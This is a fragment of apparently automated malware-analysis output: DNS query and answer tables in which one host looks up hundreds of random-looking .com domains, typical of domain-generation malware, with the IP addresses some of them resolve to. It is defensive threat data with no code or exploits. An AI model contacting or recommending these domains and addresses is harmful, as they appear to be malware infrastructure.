                                                                                                                                                                                                            Nov 11, 2024 18:08:52.574831963 CET192.168.2.91.1.1.10x82efStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.575181961 CET192.168.2.91.1.1.10xf361Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.575400114 CET192.168.2.91.1.1.10xe241Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.575860023 CET192.168.2.91.1.1.10x31e3Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576016903 CET192.168.2.91.1.1.10x45d4Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576318026 CET192.168.2.91.1.1.10x4327Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576524019 CET192.168.2.91.1.1.10xc593Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576726913 CET192.168.2.91.1.1.10x22cfStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.576998949 CET192.168.2.91.1.1.10x56c0Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.584652901 CET192.168.2.91.1.1.10x5a28Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586849928 CET192.168.2.91.1.1.10x749cStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.588783979 CET192.168.2.91.1.1.10xafaaStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.590251923 CET192.168.2.91.1.1.10xb8e2Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.778729916 CET192.168.2.91.1.1.10xecc2Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.779010057 CET192.168.2.91.1.1.10xecbfStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.779218912 CET192.168.2.91.1.1.10x302cStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.779670954 CET192.168.2.91.1.1.10x7dd7Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.837069988 CET192.168.2.91.1.1.10xdab4Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.837276936 CET192.168.2.91.1.1.10xa3a1Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.837456942 CET192.168.2.91.1.1.10xb786Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.887732029 CET192.168.2.91.1.1.10x4234Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.923197985 CET192.168.2.91.1.1.10x4b58Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.197087049 CET192.168.2.91.1.1.10x5ac1Standard query (0)purywoq.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:07:29.500741005 CET1.1.1.1192.168.2.90x1fadNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:29.500741005 CET1.1.1.1192.168.2.90x1fadNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.492224932 CET1.1.1.1192.168.2.90x4e37Name error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.494333029 CET1.1.1.1192.168.2.90x66b2Name error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.514507055 CET1.1.1.1192.168.2.90x6042Name error (3)volyqat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.518907070 CET1.1.1.1192.168.2.90xc052Name error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.521018982 CET1.1.1.1192.168.2.90x1fc5Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.523092031 CET1.1.1.1192.168.2.90xdff3Name error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.523103952 CET1.1.1.1192.168.2.90x2753No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.523103952 CET1.1.1.1192.168.2.90x2753No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.529052973 CET1.1.1.1192.168.2.90x8ac4No error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.529052973 CET1.1.1.1192.168.2.90x8ac4No error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.533390999 CET1.1.1.1192.168.2.90x7d05Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.683254004 CET1.1.1.1192.168.2.90xa100No error (0)lymyxid.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.696862936 CET1.1.1.1192.168.2.90xfcf2No error (0)puzylyp.com99.83.170.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.696862936 CET1.1.1.1192.168.2.90xfcf2No error (0)puzylyp.com75.2.71.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.119499922 CET1.1.1.1192.168.2.90x41a8Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.134676933 CET1.1.1.1192.168.2.90x3f4cName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.134713888 CET1.1.1.1192.168.2.90xee4cName error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.134968996 CET1.1.1.1192.168.2.90x7408Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.156368971 CET1.1.1.1192.168.2.90x7d6bName error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.179657936 CET1.1.1.1192.168.2.90x8f91Name error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.182482004 CET1.1.1.1192.168.2.90xd913Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.182579041 CET1.1.1.1192.168.2.90x3e5eName error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.182956934 CET1.1.1.1192.168.2.90x854aName error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.183145046 CET1.1.1.1192.168.2.90xf9c7Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.183971882 CET1.1.1.1192.168.2.90xada9Name error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.184287071 CET1.1.1.1192.168.2.90x3aa5Name error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.184300900 CET1.1.1.1192.168.2.90x6699Name error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.185431004 CET1.1.1.1192.168.2.90xea01Name error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.191701889 CET1.1.1.1192.168.2.90x12ceName error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.192584038 CET1.1.1.1192.168.2.90xd7b7Name error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.193181992 CET1.1.1.1192.168.2.90x8c4eName error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.195535898 CET1.1.1.1192.168.2.90xf991Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.195763111 CET1.1.1.1192.168.2.90xef9Name error (3)qeqyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.197088957 CET1.1.1.1192.168.2.90xdd01Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.197242975 CET1.1.1.1192.168.2.90x1c0fName error (3)vonyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.197758913 CET1.1.1.1192.168.2.90xdff6Name error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.198632956 CET1.1.1.1192.168.2.90xac61Name error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.202862024 CET1.1.1.1192.168.2.90xd506Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.204755068 CET1.1.1.1192.168.2.90x60bfName error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.206023932 CET1.1.1.1192.168.2.90x7259Name error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.206855059 CET1.1.1.1192.168.2.90xfeacName error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.210419893 CET1.1.1.1192.168.2.90x99c7Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.212877989 CET1.1.1.1192.168.2.90x7db2Name error (3)gacyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.214411020 CET1.1.1.1192.168.2.90x1604Name error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216473103 CET1.1.1.1192.168.2.90x6eaaName error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216629028 CET1.1.1.1192.168.2.90x9b04Name error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216886044 CET1.1.1.1192.168.2.90x89d7Name error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216995001 CET1.1.1.1192.168.2.90x3e26Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.217721939 CET1.1.1.1192.168.2.90xb0ddName error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.217736006 CET1.1.1.1192.168.2.90xcb82Name error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.218518972 CET1.1.1.1192.168.2.90x421cName error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.218794107 CET1.1.1.1192.168.2.90x70b2Name error (3)lyxywer.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.222842932 CET1.1.1.1192.168.2.90x9eddName error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.223121881 CET1.1.1.1192.168.2.90xef6eName error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.224760056 CET1.1.1.1192.168.2.90x7bfName error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.229293108 CET1.1.1.1192.168.2.90x696dName error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.229310036 CET1.1.1.1192.168.2.90x2158Name error (3)pumyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.321594000 CET1.1.1.1192.168.2.90xbb1fNo error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.384259939 CET1.1.1.1192.168.2.90x32d5No error (0)qetyfuv.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.386358023 CET1.1.1.1192.168.2.90x41dNo error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.426152945 CET1.1.1.1192.168.2.90xd446No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.435403109 CET1.1.1.1192.168.2.90x8457No error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.453023911 CET1.1.1.1192.168.2.90xd6eNo error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.453023911 CET1.1.1.1192.168.2.90xd6eNo error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.479360104 CET1.1.1.1192.168.2.90xd410Server failure (2)lysyfyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com178.162.203.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com178.162.203.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com178.162.203.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET1.1.1.1192.168.2.90x8ac6No error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.114747047 CET1.1.1.1192.168.2.90x6b7dNo error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.992427111 CET1.1.1.1192.168.2.90x2441Name error (3)ganyzub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.996062994 CET1.1.1.1192.168.2.90x705bName error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.996177912 CET1.1.1.1192.168.2.90x44fdName error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.000608921 CET1.1.1.1192.168.2.90x34acName error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.024355888 CET1.1.1.1192.168.2.90x36dcNo error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.024355888 CET1.1.1.1192.168.2.90x36dcNo error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.065434933 CET1.1.1.1192.168.2.90x5cfdName error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.068213940 CET1.1.1.1192.168.2.90xdcdbName error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.069690943 CET1.1.1.1192.168.2.90x211Name error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.071651936 CET1.1.1.1192.168.2.90x4701Name error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.075040102 CET1.1.1.1192.168.2.90x6840Name error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.138256073 CET1.1.1.1192.168.2.90xa9beName error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.166023970 CET1.1.1.1192.168.2.90x2296Name error (3)puvylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.176512957 CET1.1.1.1192.168.2.90x32d0Name error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.189127922 CET1.1.1.1192.168.2.90xf64eName error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.422643900 CET1.1.1.1192.168.2.90xbc03Name error (3)lyvywed.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423027039 CET1.1.1.1192.168.2.90xaf78Name error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423528910 CET1.1.1.1192.168.2.90xdd4cName error (3)qegyfyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423540115 CET1.1.1.1192.168.2.90x91caName error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423549891 CET1.1.1.1192.168.2.90x4b5aName error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423559904 CET1.1.1.1192.168.2.90xcd2cName error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423571110 CET1.1.1.1192.168.2.90x284bName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423628092 CET1.1.1.1192.168.2.90xea3cName error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423676014 CET1.1.1.1192.168.2.90x2866Name error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423744917 CET1.1.1.1192.168.2.90x4673Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423798084 CET1.1.1.1192.168.2.90x2f71Name error (3)vocyqaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.423847914 CET1.1.1.1192.168.2.90x9f4aName error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.424097061 CET1.1.1.1192.168.2.90x52f2Name error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.424369097 CET1.1.1.1192.168.2.90x65d4Name error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.425237894 CET1.1.1.1192.168.2.90xa6eaName error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.425385952 CET1.1.1.1192.168.2.90xee3fName error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.425733089 CET1.1.1.1192.168.2.90x52feName error (3)qeqytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426126003 CET1.1.1.1192.168.2.90xc0adName error (3)qedyveg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426233053 CET1.1.1.1192.168.2.90xe1e9Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426321030 CET1.1.1.1192.168.2.90x2b3aName error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426331043 CET1.1.1.1192.168.2.90xa661Name error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426374912 CET1.1.1.1192.168.2.90xf403Name error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426549911 CET1.1.1.1192.168.2.90xaef4Name error (3)volyjok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.426937103 CET1.1.1.1192.168.2.90xa0bbName error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427011967 CET1.1.1.1192.168.2.90xdbcName error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427262068 CET1.1.1.1192.168.2.90x4bebName error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427557945 CET1.1.1.1192.168.2.90xc01dName error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427567005 CET1.1.1.1192.168.2.90xc8b8Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427776098 CET1.1.1.1192.168.2.90xc659Name error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.427892923 CET1.1.1.1192.168.2.90xd698Name error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.431126118 CET1.1.1.1192.168.2.90x1dbaName error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.431375027 CET1.1.1.1192.168.2.90xfa96Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.432061911 CET1.1.1.1192.168.2.90xd6c3Name error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.432415962 CET1.1.1.1192.168.2.90x89cbName error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.436433077 CET1.1.1.1192.168.2.90x6adfName error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.443660021 CET1.1.1.1192.168.2.90x5dd3Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.444919109 CET1.1.1.1192.168.2.90x1d4Name error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.445233107 CET1.1.1.1192.168.2.90x3f3dName error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.447393894 CET1.1.1.1192.168.2.90x2e83Name error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.447828054 CET1.1.1.1192.168.2.90xf839Name error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448220015 CET1.1.1.1192.168.2.90x32d2Name error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448268890 CET1.1.1.1192.168.2.90x5da7Name error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448738098 CET1.1.1.1192.168.2.90xe85aName error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.448872089 CET1.1.1.1192.168.2.90xed35Name error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.449493885 CET1.1.1.1192.168.2.90x278fName error (3)gahyfyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.450148106 CET1.1.1.1192.168.2.90xb16Name error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.462630033 CET1.1.1.1192.168.2.90x5106No error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.462630033 CET1.1.1.1192.168.2.90x5106No error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.608338118 CET1.1.1.1192.168.2.90xda2cNo error (0)lygynud.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.617007017 CET1.1.1.1192.168.2.90x5f57No error (0)pupycag.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.705991030 CET1.1.1.1192.168.2.90xe367No error (0)lyrysor.comzz1985.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.705991030 CET1.1.1.1192.168.2.90xe367No error (0)zz1985.qu200.comgtm-sg-6l13ukk0m05.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.705991030 CET1.1.1.1192.168.2.90xe367No error (0)gtm-sg-6l13ukk0m05.qu200.com103.150.10.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.752036095 CET1.1.1.1192.168.2.90x5751Name error (3)lyrytun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.760979891 CET1.1.1.1192.168.2.90x6dd7Name error (3)qebykap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.761003017 CET1.1.1.1192.168.2.90xec3fName error (3)lyvyjox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.763149023 CET1.1.1.1192.168.2.90x9a17Name error (3)puvyjop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.765381098 CET1.1.1.1192.168.2.90xf89fName error (3)qedysov.comnonenoneA (IP address)IN (0x0001)false
